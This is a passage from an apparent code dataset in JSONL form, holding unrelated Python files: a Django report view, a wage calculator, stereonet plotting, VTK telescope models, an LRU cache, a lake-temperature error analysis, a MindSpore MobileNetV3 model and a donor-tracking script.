data})\n\n\ndef report2(request):\n\tdevice_type = request.POST.get(\"device_type\")\n\trequested_date = datetime.now()\n\tstart_date = requested_date - timedelta(days = 30)\n\t\n\tdevice_types = HealthReport.objects.values(\"device_type\").distinct().order_by(\"device_type\")\n\n\tif request.POST:\n\t\tdata = HealthReport.objects.filter(timestamp__range=(start_date, requested_date), device_type=device_type).annotate(day = TruncDate('timestamp')).values(\"day\").annotate(cnt = Count(\"device_id\", Distinct = True)).values(\"day\", \"cnt\").order_by(\"day\")\n\telse:\n\t\tdata = []\n\n\treturn render(request, 'report2.html', {\"device_types\": device_types, \"data\": data, \"device_type\": device_type})","sub_path":"kiwi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"372458911","text":"while True:\r\n hoursWorked = input(\"How many hours did you work? \\n\")\r\n try:\r\n hoursWorked = float(hoursWorked)\r\n except ValueError:\r\n print(\"Please enter a number(i.e. 24, not twenty-four)\")\r\n continue\r\n break\r\nwhile True:\r\n payPerHour = input(\"How much do you get paid per hour? \\n\") \r\n try:\r\n payPerHour = float(payPerHour)\r\n except ValueError:\r\n print(\"Please enter a number(i.e. 
24, not twenty-four)\")\r\n continue\r\n break\r\nif hoursWorked <= 40:\r\n grossWages = hoursWorked * payPerHour\r\nelse: \r\n grossWages = (payPerHour * 40) + ((hoursWorked - 40) * (payPerHour * 1.5))\r\nprint(\"Your gross wages are: \",grossWages)","sub_path":"grosswages.py","file_name":"grosswages.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"257384972","text":"from math import factorial\nnum = int(input('Введите число - '))\ndef fact(num):\n for i in range(num+1):\n el = factorial(i)\n print('Факториал числа', i, '= ', end = '')\n yield el\n\nfor el in fact(num):\n print(el)\n","sub_path":"hw7.py","file_name":"hw7.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168242616","text":"import sys\nimport Server\n\n\ndef Main():\n if len(sys.argv) != 3:\n return print(\"You have not entered necessary arguments.\")\n\n input_name = sys.argv[1]\n output_name = sys.argv[2]\n\n c = Server.Init()\n Server.Clear_File(c, output_name)\n if Server.Input(c, input_name) != 0:\n if Server.Out(c, output_name) != 0:\n Server.Sort(c)\n Server.Out(c, output_name)\n Server.Out_Filter(c, output_name)\n Server.Clear(c, output_name)\n\n\nif __name__ == '__main__':\n print(\"START\")\n Main()\n print(\"STOP\")\n\n","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"652463458","text":"#DESCRIPTION:\n#generic functions for plotting data in stereonet\n\n\n#1. libraries and modules\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import beta\nimport matplotlib.cm as cm\n\n\n\n\ndef spherical_to_polar_to_cart(dip,ddir):\n #spherical (dip-dip direction or plunge-trend)\n dip=np.asarray(dip)\n ddir=np.asarray(ddir)\n z=1+np.sin(np.radians(dip))\n x=np.cos(np.radians(dip))\n zenith_angle=(np.arctan(x/z))\n #to polar (radius, theta)\n r=np.tan(zenith_angle)\n theta=-ddir+90\n #to cartesian (x,y)\n X=r*np.cos(np.radians(theta))\n Y=r*np.sin(np.radians(theta))\n return X,Y\n\ndef plot_stereonet():\n #plot blank stereonet with small circles and E-W and N-S lines\n small_circles=[15,30,45,60,75]\n theta=np.linspace(0,2*np.radians(360),1000)\n ax=plt.gca()\n X=np.cos(theta)\n Y=np.sin(theta)\n ax.plot(X,Y,'k-')\n ax.plot([-1,1],[0,0],'k-',lw=0.1)\n ax.plot([0,0],[-1,1],'k-',lw=0.1)\n sc_list=[]\n for d in small_circles:\n z=1+np.sin(np.radians(d))\n x=np.cos(np.radians(d))\n zenith_angle=(np.arctan(x/z))\n r=np.tan(zenith_angle)\n X=r*np.cos(theta)\n Y=r*np.sin(theta)\n sc=plt.plot(X,Y,'k-',lw=0.1)\n sc_list.append(sc)\n ax.axis('equal')\n ax.set_xticks([])\n ax.set_yticks([])\n return ax,sc_list\n\ndef draw_great_circle(dip,ddir,lc,lw):\n #plot great circle on stereonet\n a=np.linspace(-90,90,1000)\n adipdir_list=ddir+a\n\n delta_az=np.abs(adipdir_list-ddir)\n delta_az=np.where(delta_az>180,360-delta_az,delta_az)\n d_adip=np.where(delta_az<=90,\n np.degrees(np.arctan(np.tan(np.radians(dip))*np.cos(np.radians(delta_az)))),\n -1*np.ones(delta_az.shape))\n\n X,Y=spherical_to_polar_to_cart(d_adip,adipdir_list)\n ax=plt.gca()\n gc=ax.plot(X,Y,'-',color=lc,lw=lw)\n return gc\n\ndef plot_colorvalue_data(dip,ddir,col,mincol,maxcol,size):\n #plot data with color value in current stereoplot\n X,Y=spherical_to_polar_to_cart(dip,ddir)\n 
sc=plt.scatter(X[np.argsort(col)],Y[np.argsort(col)],\n c=np.sort(col),s=size,vmin=mincol,vmax=maxcol,cmap=cm.jet,linewidth=0)\n \n \n\ndef plot_data(dip,ddir,size,mar):\n #plot data in current stereoplot\n X,Y=spherical_to_polar_to_cart(dip,ddir)\n ax=plt.gca()\n ax.scatter(X,Y,s=size,marker=mar)\n \n \n \n \n","sub_path":"generic_stereo_plotting.py","file_name":"generic_stereo_plotting.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"132988227","text":"import vtk\nimport numpy as np\nfrom vtk.util.colors import tomato\nfrom ..utils.cam_utils import get_cam_height\n\ncam_height = get_cam_height(\"LSTCam\")\n\n\ndef LST_tel_structure():\n # ARCH CREATOR\n res_arch = 100\n nsidestube = 8\n\n dist = np.linspace(-11.5, 11.5, res_arch)\n points = vtk.vtkPoints()\n for i in range(len(dist)):\n x_coord = -28/300*dist[i]**2 - 0.001*dist[i]**4 + cam_height\n y_coord = 0\n z_coord = dist[i]\n points.InsertPoint(i, x_coord, y_coord, z_coord)\n lines = vtk.vtkCellArray()\n lines.InsertNextCell(res_arch)\n\n for i in range(len(dist)):\n lines.InsertCellPoint(i)\n\n polyData = vtk.vtkPolyData()\n polyData.SetPoints(points)\n polyData.SetLines(lines)\n\n tube = vtk.vtkTubeFilter()\n tube.SetInputData(polyData)\n tube.SetNumberOfSides(nsidestube)\n tube.SetRadius(0.2)\n\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(tube.GetOutputPort())\n # mapper.ScalarVisibilityOn()\n mapper.SetScalarModeToUsePointFieldData()\n\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(tomato)\n #actor.SetPosition(cam_height, 0, 0)\n\n return actor\n\n\ndef LST_create_mirror_plane():\n # create a sphere\n sphere = vtk.vtkSphere()\n sphere.SetRadius(12)\n sphere.SetCenter(0, 0, 0)\n\n # create a box\n box = vtk.vtkSphere()\n box.SetRadius(28.)\n box.SetCenter(25, 0, 0)\n\n # box = vtk.vtkBox()\n # box.SetBounds(-1, 1, -1, 1, -1, 1)\n\n # combine the two implicit functions\n boolean = vtk.vtkImplicitBoolean()\n boolean.SetOperationTypeToDifference()\n\n # boolean.SetOperationTypeToUnion()\n # boolean.SetOperationTypeToIntersection()\n boolean.AddFunction(sphere)\n boolean.AddFunction(box)\n\n # The sample function generates a distance function from the implicit\n # function. 
This is then contoured to get a polygonal surface.\n sample = vtk.vtkSampleFunction()\n sample.SetImplicitFunction(boolean)\n sample.SetModelBounds(-50, 50, -50, 50, -50, 50)\n sample.SetSampleDimensions(200, 200, 200)\n sample.ComputeNormalsOff()\n\n # contour\n surface = vtk.vtkContourFilter()\n surface.SetInputConnection(sample.GetOutputPort())\n surface.SetValue(0, 0.0)\n\n # mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(surface.GetOutputPort())\n #mapper.ScalarVisibilityOff()\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n #actor.GetProperty().EdgeVisibilityOn()\n actor.GetProperty().SetColor(tomato)\n # actor.SetPosition(cam_height, 0, 0)\n\n return actor\n","sub_path":"CREED_VTK/telescope/LST.py","file_name":"LST.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549579041","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport time\n\n\nclass LRUCache:\n\n # @param capacity, an integer\n def __init__(self, capacity):\n self.db = {}\n self.capacity = capacity\n\n # @return an integer\n def get(self, key):\n ret = -1\n if key in self.db:\n ret = self.db[key]['val']\n self.db[key]['cnt'] = time.time()\n return ret\n\n # @param key, an integer\n # @param value, an integer\n # @return nothing\n def set(self, key, value):\n if key not in self.db and len(self.db) == self.capacity:\n min_k = None\n min_c = time.time()\n for k in self.db:\n if self.db[k]['cnt'] < min_c:\n min_c = self.db[k]['cnt']\n min_k = k\n self.db.pop(min_k)\n self.db[key] = {'val': value, 'cnt': time.time()}\n\n\n# vim:ai:et:sts=4:sw=4:\n","sub_path":"python/lru-cache.py","file_name":"lru-cache.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"490684811","text":"# Copyright 2020-2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"MobileNetV3 model define\"\"\"\nfrom functools import partial\nimport numpy as np\nimport mindspore as ms\nimport mindspore.nn as nn\nimport mindspore.ops as ops\n\n\n__all__ = ['mobilenet_v3_large',\n 'mobilenet_v3_small']\n\n\ndef _make_divisible(x, divisor=8):\n return int(np.ceil(x * 1. 
/ divisor) * divisor)\n\n\nclass Activation(nn.Cell):\n \"\"\"\n Activation definition.\n\n Args:\n act_func(string): activation name.\n\n Returns:\n Tensor, output tensor.\n \"\"\"\n\n def __init__(self, act_func):\n super(Activation, self).__init__()\n if act_func == 'relu':\n self.act = nn.ReLU()\n elif act_func == 'relu6':\n self.act = nn.ReLU6()\n elif act_func in ('hsigmoid', 'hard_sigmoid'):\n self.act = nn.HSigmoid()\n elif act_func in ('hswish', 'hard_swish'):\n self.act = nn.HSwish()\n else:\n raise NotImplementedError\n\n def construct(self, x):\n return self.act(x)\n\n\nclass GlobalAvgPooling(nn.Cell):\n \"\"\"\n Global avg pooling definition.\n\n Args:\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> GlobalAvgPooling()\n \"\"\"\n\n def __init__(self, keep_dims=False):\n super(GlobalAvgPooling, self).__init__()\n self.mean = ops.ReduceMean(keep_dims=keep_dims)\n\n def construct(self, x):\n x = self.mean(x, (2, 3))\n return x\n\n\nclass SE(nn.Cell):\n \"\"\"\n SE warpper definition.\n\n Args:\n num_out (int): Numbers of output channels.\n ratio (int): middle output ratio.\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> SE(4)\n \"\"\"\n\n def __init__(self, num_out, ratio=4):\n super(SE, self).__init__()\n num_mid = _make_divisible(num_out // ratio)\n self.pool = GlobalAvgPooling(keep_dims=True)\n self.conv1 = nn.Conv2d(in_channels=num_out, out_channels=num_mid,\n kernel_size=1, has_bias=True, pad_mode='pad')\n self.act1 = Activation('relu')\n self.conv2 = nn.Conv2d(in_channels=num_mid, out_channels=num_out,\n kernel_size=1, has_bias=True, pad_mode='pad')\n self.act2 = Activation('hsigmoid')\n self.mul = ops.Mul()\n\n def construct(self, x):\n out = self.pool(x)\n out = self.conv1(out)\n out = self.act1(out)\n out = self.conv2(out)\n out = self.act2(out)\n out = self.mul(x, out)\n return out\n\n\nclass Unit(nn.Cell):\n \"\"\"\n Unit warpper definition.\n\n Args:\n num_in (int): Input channel.\n num_out (int): Output channel.\n kernel_size (int): Input kernel size.\n stride (int): Stride size.\n padding (int): Padding number.\n num_groups (int): Output num group.\n use_act (bool): Used activation or not.\n act_type (string): Activation type.\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> Unit(3, 3)\n \"\"\"\n\n def __init__(self, num_in, num_out, kernel_size=1, stride=1, padding=0, num_groups=1,\n use_act=True, act_type='relu'):\n super(Unit, self).__init__()\n self.conv = nn.Conv2d(in_channels=num_in,\n out_channels=num_out,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n group=num_groups,\n has_bias=False,\n pad_mode='pad')\n self.bn = nn.BatchNorm2d(num_out)\n self.use_act = use_act\n self.act = Activation(act_type) if use_act else None\n\n def construct(self, x):\n out = self.conv(x)\n out = self.bn(out)\n if self.use_act:\n out = self.act(out)\n return out\n\n\nclass ResUnit(nn.Cell):\n \"\"\"\n ResUnit warpper definition.\n\n Args:\n num_in (int): Input channel.\n num_mid (int): Middle channel.\n num_out (int): Output channel.\n kernel_size (int): Input kernel size.\n stride (int): Stride size.\n act_type (str): Activation type.\n use_se (bool): Use SE warpper or not.\n\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> ResUnit(16, 3, 1, 1)\n \"\"\"\n def __init__(self, num_in, num_mid, num_out, kernel_size, stride=1, act_type='relu', use_se=False):\n super(ResUnit, self).__init__()\n self.use_se = use_se\n self.first_conv = (num_out != num_mid)\n self.use_short_cut_conv = True\n\n if self.first_conv:\n self.expand = 
Unit(num_in, num_mid, kernel_size=1,\n stride=1, padding=0, act_type=act_type)\n else:\n self.expand = None\n self.conv1 = Unit(num_mid, num_mid, kernel_size=kernel_size, stride=stride,\n padding=self._get_pad(kernel_size), act_type=act_type, num_groups=num_mid)\n if use_se:\n self.se = SE(num_mid)\n self.conv2 = Unit(num_mid, num_out, kernel_size=1, stride=1,\n padding=0, act_type=act_type, use_act=False)\n if num_in != num_out or stride != 1:\n self.use_short_cut_conv = False\n self.add = ops.Add() if self.use_short_cut_conv else None\n\n def construct(self, x):\n \"\"\"construct\"\"\"\n if self.first_conv:\n out = self.expand(x)\n else:\n out = x\n out = self.conv1(out)\n if self.use_se:\n out = self.se(out)\n out = self.conv2(out)\n if self.use_short_cut_conv:\n out = self.add(x, out)\n return out\n\n def _get_pad(self, kernel_size):\n \"\"\"set the padding number\"\"\"\n pad = 0\n if kernel_size == 1:\n pad = 0\n elif kernel_size == 3:\n pad = 1\n elif kernel_size == 5:\n pad = 2\n elif kernel_size == 7:\n pad = 3\n else:\n raise NotImplementedError\n return pad\n\n\nclass MobileNetV3(nn.Cell):\n \"\"\"\n MobileNetV3 architecture.\n\n Args:\n model_cfgs (Cell): number of classes.\n num_classes (int): Output number classes.\n multiplier (int): Channels multiplier for round to 8/16 and others. Default is 1.\n final_drop (float): Dropout number.\n round_nearest (list): Channel round to . Default is 8.\n Returns:\n Tensor, output tensor.\n\n Examples:\n >>> MobileNetV3(num_classes=1000)\n \"\"\"\n\n def __init__(self, model_cfgs, num_classes=1000, multiplier=1., final_drop=0.,\n round_nearest=8, include_top=True, activation=\"None\"):\n super(MobileNetV3, self).__init__()\n self.cfgs = model_cfgs['cfg']\n self.inplanes = 16\n self.features = []\n first_conv_in_channel = 3\n first_conv_out_channel = _make_divisible(multiplier * self.inplanes)\n\n self.features.append(nn.Conv2d(in_channels=first_conv_in_channel,\n out_channels=first_conv_out_channel,\n kernel_size=3, padding=1, stride=2,\n has_bias=False, pad_mode='pad'))\n self.features.append(nn.BatchNorm2d(first_conv_out_channel))\n self.features.append(Activation('hswish'))\n for layer_cfg in self.cfgs:\n self.features.append(self._make_layer(kernel_size=layer_cfg[0],\n exp_ch=_make_divisible(multiplier * layer_cfg[1]),\n out_channel=_make_divisible(multiplier * layer_cfg[2]),\n use_se=layer_cfg[3],\n act_func=layer_cfg[4],\n stride=layer_cfg[5]))\n output_channel = _make_divisible(multiplier * model_cfgs[\"cls_ch_squeeze\"])\n self.features.append(nn.Conv2d(in_channels=_make_divisible(multiplier * self.cfgs[-1][2]),\n out_channels=output_channel,\n kernel_size=1, padding=0, stride=1,\n has_bias=False, pad_mode='pad'))\n self.features.append(nn.BatchNorm2d(output_channel))\n self.features.append(Activation('hswish'))\n self.features.append(GlobalAvgPooling(keep_dims=True))\n self.features.append(nn.Conv2d(in_channels=output_channel,\n out_channels=model_cfgs['cls_ch_expand'],\n kernel_size=1, padding=0, stride=1,\n has_bias=False, pad_mode='pad'))\n self.features.append(Activation('hswish'))\n if final_drop > 0:\n self.features.append((nn.Dropout(p=1 - final_drop)))\n\n # make it nn.CellList\n self.features = nn.SequentialCell(self.features)\n self.include_top = include_top\n self.need_activation = False\n if self.include_top:\n self.output = nn.Conv2d(in_channels=model_cfgs['cls_ch_expand'],\n out_channels=num_classes,\n kernel_size=1, has_bias=True, pad_mode='pad')\n self.squeeze = ops.Squeeze(axis=(2, 3))\n if activation != 
\"None\":\n self.need_activation = True\n if activation == \"Sigmoid\":\n self.activation = ops.Sigmoid()\n elif activation == \"Softmax\":\n self.activation = ops.Softmax()\n else:\n raise NotImplementedError(f\"The activation {activation} not in [Sigmoid, Softmax].\")\n\n self._initialize_weights()\n\n def construct(self, x):\n x = self.features(x)\n if self.include_top:\n x = self.output(x)\n x = self.squeeze(x)\n if self.need_activation:\n x = self.activation(x)\n return x\n\n\n def _make_layer(self, kernel_size, exp_ch, out_channel, use_se, act_func, stride=1):\n mid_planes = exp_ch\n out_planes = out_channel\n\n layer = ResUnit(self.inplanes, mid_planes, out_planes,\n kernel_size, stride=stride, act_type=act_func, use_se=use_se)\n self.inplanes = out_planes\n return layer\n\n def _initialize_weights(self):\n \"\"\"\n Initialize weights.\n\n Args:\n\n Returns:\n None.\n\n Examples:\n >>> _initialize_weights()\n \"\"\"\n self.init_parameters_data()\n for _, m in self.cells_and_names():\n if isinstance(m, (nn.Conv2d)):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.set_data(ms.Tensor(np.random.normal(0, np.sqrt(2. / n),\n m.weight.data.shape).astype(\"float32\")))\n if m.bias is not None:\n m.bias.set_data(\n ms.numpy.zeros(m.bias.data.shape, dtype=\"float32\"))\n elif isinstance(m, nn.BatchNorm2d):\n m.gamma.set_data(\n ms.Tensor(np.ones(m.gamma.data.shape, dtype=\"float32\")))\n m.beta.set_data(\n ms.numpy.zeros(m.beta.data.shape, dtype=\"float32\"))\n elif isinstance(m, nn.Dense):\n m.weight.set_data(ms.Tensor(np.random.normal(\n 0, 0.01, m.weight.data.shape).astype(\"float32\")))\n if m.bias is not None:\n m.bias.set_data(ms.numpy.zeros(m.bias.data.shape, dtype=\"float32\"))\n\n\ndef mobilenet_v3(model_name, **kwargs):\n \"\"\"\n Constructs a MobileNet V2 model\n \"\"\"\n model_cfgs = {\n \"large\": {\n \"cfg\": [\n # k, exp, c, se, nl, s,\n [3, 16, 16, False, 'relu', 1],\n [3, 64, 24, False, 'relu', 2],\n [3, 72, 24, False, 'relu', 1],\n [5, 72, 40, True, 'relu', 2],\n [5, 120, 40, True, 'relu', 1],\n [5, 120, 40, True, 'relu', 1],\n [3, 240, 80, False, 'hswish', 2],\n [3, 200, 80, False, 'hswish', 1],\n [3, 184, 80, False, 'hswish', 1],\n [3, 184, 80, False, 'hswish', 1],\n [3, 480, 112, True, 'hswish', 1],\n [3, 672, 112, True, 'hswish', 1],\n [5, 672, 160, True, 'hswish', 2],\n [5, 960, 160, True, 'hswish', 1],\n [5, 960, 160, True, 'hswish', 1]],\n \"cls_ch_squeeze\": 960,\n \"cls_ch_expand\": 1280,\n },\n \"small\": {\n \"cfg\": [\n # k, exp, c, se, nl, s,\n [3, 16, 16, True, 'relu', 2],\n [3, 72, 24, False, 'relu', 2],\n [3, 88, 24, False, 'relu', 1],\n [5, 96, 40, True, 'hswish', 2],\n [5, 240, 40, True, 'hswish', 1],\n [5, 240, 40, True, 'hswish', 1],\n [5, 120, 48, True, 'hswish', 1],\n [5, 144, 48, True, 'hswish', 1],\n [5, 288, 96, True, 'hswish', 2],\n [5, 576, 96, True, 'hswish', 1],\n [5, 576, 96, True, 'hswish', 1]],\n \"cls_ch_squeeze\": 576,\n \"cls_ch_expand\": 1280,\n }\n }\n return MobileNetV3(model_cfgs[model_name], **kwargs)\n\n\nmobilenet_v3_large = partial(mobilenet_v3, model_name=\"large\")\nmobilenet_v3_small = partial(mobilenet_v3, model_name=\"small\")\n","sub_path":"official/cv/MobileNet/mobilenetv3/src/mobilenetV3.py","file_name":"mobilenetV3.py","file_ext":"py","file_size_in_byte":14211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"563092212","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection 
import KFold\nimport pdb\nimport sys\nsys.path.append('../../data')\nfrom scipy.stats import spearmanr\nimport re\nimport os\nimport glob\n\nmetadata = pd.read_feather(\"../../../metadata/lake_metadata_2700plus.feather\")\nsites = pd.read_csv('../../../metadata/sites_moreThan10ProfilesWithGLM_Mar2020Update.csv')\nids = pd.read_csv('../../../metadata/pball_site_ids.csv', header=None)\nids = ids[0].values\nglm_all_f = pd.read_csv(\"../../../results/glm_transfer/RMSE_transfer_glm_pball.csv\")\ntrain_df = pd.read_feather(\"../../../results/transfer_learning/glm/train_rmses_pball.feather\")\ntrain_lakes = [re.search('nhdhr_(.*)', x).group(1) for x in np.unique(glm_all_f['target_id'].values)]\nn_lakes = len(train_lakes)\nall_sites = metadata['site_id'].values\nall_test_lakes = all_sites[~np.isin(all_sites, train_lakes)]\n\nglm_all_f = pd.read_csv(\"../../../results/glm_transfer/RMSE_transfer_glm_pball.csv\")\ntrain_df = pd.read_feather(\"../../../results/transfer_learning/glm/train_rmses_pball.feather\")\ntrain_lakes = [re.search('nhdhr_(.*)', x).group(1) for x in np.unique(glm_all_f['target_id'].values)]\nn_lakes = len(train_lakes)\nsome_test_lakes = ids[~np.isin(ids, train_lakes)]\n\n\nglm_err_per_depth = np.empty((550),dtype=np.object)\n# glm_err_per_depth = [[] for i in range(550)]\npg_err_per_depth = np.empty((550),dtype=np.object)\n# pg_err_per_depth = [[] for i in range(550)]\n\nfor i in range(550):\n glm_err_per_depth[i] = []\n pg_err_per_depth[i] = []\n# pg_err_per_depth[:] = 0\n# glm_err_per_depth[:] = 0\nct_per_depth = np.empty((550))\nct_per_depth[:] = 0\n# some_test_lakes = all_test_lakes\n# all_test_lakes = np.array(all_test_lakes[0:4])\nfor site_ct, site_id in enumerate(all_test_lakes):\n\tprint(\"site \", site_ct,\"/\",len(all_test_lakes))\n\n\t#load output files\n\toutput = pd.read_feather('./mtl_outputs/nhdhr_'+site_id+'/9source_ensemble_output')\n\n\t#load glm file\n\tglm_out = np.load('../../../data/processed/lake_data/'+site_id+'/glm.npy')\n\tglm_dates = np.load('../../../data/processed/lake_data/'+site_id+'/dates.npy')\n\tlabels_npy = np.load('../../../data/processed/lake_data/'+site_id+'/full.npy')\n\n\n\t#load label\n\tlabel = pd.read_feather('./mtl_outputs/nhdhr_'+site_id+'/labels')\n\n\t#align glm and output dates\n\tfor d in range(glm_out.shape[0]):\n\t\tglm_err = np.sqrt(np.nanmean((glm_out[d,:]-labels_npy[d,:])**2))\n\t\t# if site_ct == 2:\n\t\t\t# pdb.set_trace()\n\t\tpg_err = np.sqrt(np.nanmean((np.array(output.iloc[d,1:].values,dtype=np.float32) - np.array(label.iloc[d,1:].values,dtype=np.float32))**2))\n\t\tif np.isnan(pg_err):\n\t\t\tcontinue\n\t\telif np.isnan(glm_err):\n\t\t\tprint(\"glm err nan?\")\n\t\t\tpdb.set_trace()\n\t\t\tcontinue\n\t\telse:\n\t\t\tpg_err_per_depth[d].append(pg_err)\n\t\t\t# pg_err_per_depth[d] += pg_err\n\t\t\t# glm_err_per_depth[d] += glm_err\n\t\t\tglm_err_per_depth[d].append(glm_err)\n\t\t\t# ct_per_depth[d] += 1\npg_medians = [np.median(np.array(pg_err_per_depth[i])) for i in range(550)]\nglm_medians = [np.median(np.array(glm_err_per_depth[i])) for i in range(550)]\n# pg_means = (pg_err_per_depth / ct_per_depth)\n# glm_means = (glm_err_per_depth / ct_per_depth)\na = pd.DataFrame()\na['pg_median'] = pg_medians\na['glm_median'] = glm_medians\n# a['lakes_w_depth'] = 
ct_per_depth\na.to_csv('./err_by_depth_2233lakes_median.csv')\n\n\n\n","sub_path":"src/scripts/manylakes2/computeErrorByDepth.py","file_name":"computeErrorByDepth.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238637126","text":"import sys\n\n\ndonor_data = {\"sai emani\": [20.23, 30.456, 50.786],\n \"sirisha marthy\": [67.89, 45.89],\n \"ani emani\": [12.789, 5.456],\n \"charles dickens\": [15.89, 89.20, 345.67],\n \"mark twain\": [678.986]\n }\n\n\nclass Donor(object):\n def __init__(self, name, donations):\n if not name:\n raise ValueError(\"Donor name can not be empty\")\n self.name = name\n if not donations:\n self.donations = []\n else:\n self.donations = donations\n\n @property\n def first_name(self):\n name_split = self.name.split()\n if len(name_split) >= 1:\n return name_split[0]\n\n @property\n def last_name(self):\n name_split = self.name.split()\n if len(name_split) == 1:\n return ''\n else:\n return ''.join(name_split[1:])\n @property\n def donor_donations(self):\n \"\"\"\n Returns list of donor donations\n :return: list of donor donations\n \"\"\"\n return self.donations\n @property\n def donor_donations_sum(self):\n \"\"\"\n Returns sum of all donor donations\n :return: donor latest donation\n \"\"\"\n return sum(self.donations)\n @property\n def latest_donation(self):\n \"\"\"\n Returns donor latest donation\n :return: donor latest donation\n \"\"\"\n if self.donations:\n return self.donations[-1]\n\n def add_donation(self, amount):\n \"\"\"\n Adds donation to donor donations\n :return:\n \"\"\"\n if float(amount) <= 0:\n raise ValueError(\"donation amount can not be negative\")\n self.donations.append(float(amount))\n\n def generate_letter(self):\n \"\"\" Generate letter for donor \"\"\"\n return \"Dear {},\\n \\nThank you for your generous donation {}.\\n \\n\\n\\t\\tSincerely, \\n\\t\\tLocal Charity\". 
\\\n format(self.name, self.latest_donation)\n\nclass Donors(object):\n def __init__(self, donors_list=None):\n # list of donors objects\n if not donors_list:\n self.donors_list = []\n else:\n self.donors_list = donors_list\n @property\n def list_of_donors(self):\n return [donor.name for donor in self.donors_list]\n\n @property\n def count(self):\n return len(self.donors_list)\n\n def add_donor(self, donor):\n self.donors_list.append(donor)\n\n def get_donor(self, name):\n if name == \"\":\n return None\n\n for donor in self.donors_list:\n if donor == name:\n return donor\n new_donor = Donor(name, [])\n self.add_donor(new_donor)\n return new_donor\n\n def send_letters(self):\n \"\"\" Send letters to every one, the letters will be stored as text files on disk \"\"\"\n for donor in self.donors_list:\n file_name = donor.name + \".txt\"\n letter = donor.generate_letter()\n with open(file_name, \"w\") as f:\n f.write(letter)\n\n def create_a_report(self):\n \"\"\" Prints donor information for all donors\n \"\"\"\n print(\"Donor Name | Total Given | Num Gifts | Average Gift\")\n for donor in self.donors_list:\n if donor.donations:\n print(f\"{donor.name:26} $ {sum(donor.donations):>10.2f} {len(donor.donations):9} \"\n f\"${sum(donor.donations)/len(donor.donations):>12.2f}\")\n else:\n print(\"coming to else\")\n\n def load_donors_list(self):\n temp_list = []\n donations = []\n for donor in donor_data:\n donor_obj = Donor(donor, donations)\n donor_obj.donations = donor_data[donor]\n temp_list.append(donor_obj)\n self.donors_list = temp_list\n return self.count\n\n def save_donors_list(self):\n for donor in self.donors_list:\n if donor.name not in donor_data:\n donor_data[donor.name] = donor.donations\n return self.count\n\n def total_contribution(self):\n return sum([sum(d.donations) for d in self.donors_list])\n\n def challenge(self, mul, min_donation=None, max_donation=None):\n if min_donation and max_donation:\n def func(x): return max_donation > x > min_donation\n\n elif min_donation:\n def func(x): return x > min_donation\n\n elif max_donation:\n def func(x): return x < max_donation\n else:\n def func(x): return True\n\n return Donors([Donor(donor.name, list(map(lambda x: x ** mul, filter(func, donor.donations))))\n for donor in self.donors_list])\n\n\ndef send_a_thankyou(donors_obj):\n \"\"\" Sends thank you message for the donors\n \"\"\"\n while True:\n name = str(\n input(\"Please enter donor name (enter \\\"list\\\" to show list of donor names, enter \\\"q\\\" to quit)\"))\n if name == \"q\":\n return\n elif name == \"list\":\n print(\"List of donor names\")\n print((\"{}\\n\" * donors_obj.count).format(*donors_obj.list_of_donors))\n continue\n else:\n donor = donors_obj.get_donor(name)\n if not donor:\n print(\"Name can not be empty\")\n continue\n else:\n break\n while True:\n try:\n amount = input(\"Please enter donation amount\")\n if float(amount) <= 0:\n print(\"amount donated must be a +ve number\")\n else:\n break\n except ValueError:\n print(\"Enter positive number\")\n donor.add_donation(amount)\n #for donor in donors_obj.donors_list:\n # print(\"Donor name {} and donation {}\".format(donor.name, donor.donations))\n print(donor.generate_letter())\n\ndef menu(menu_data):\n\n \"\"\" Select one of the four items in the menu\n And returns the number \"\"\"\n\n print(\"\\nPlease choose one of the following options:\")\n\n for index, menu_item in enumerate(menu_data): # Prints the menu user text\n print(f\"{index + 1}) {menu_item[0]}\")\n\n choice = int(input(\"> \")) - 1\n\n if 
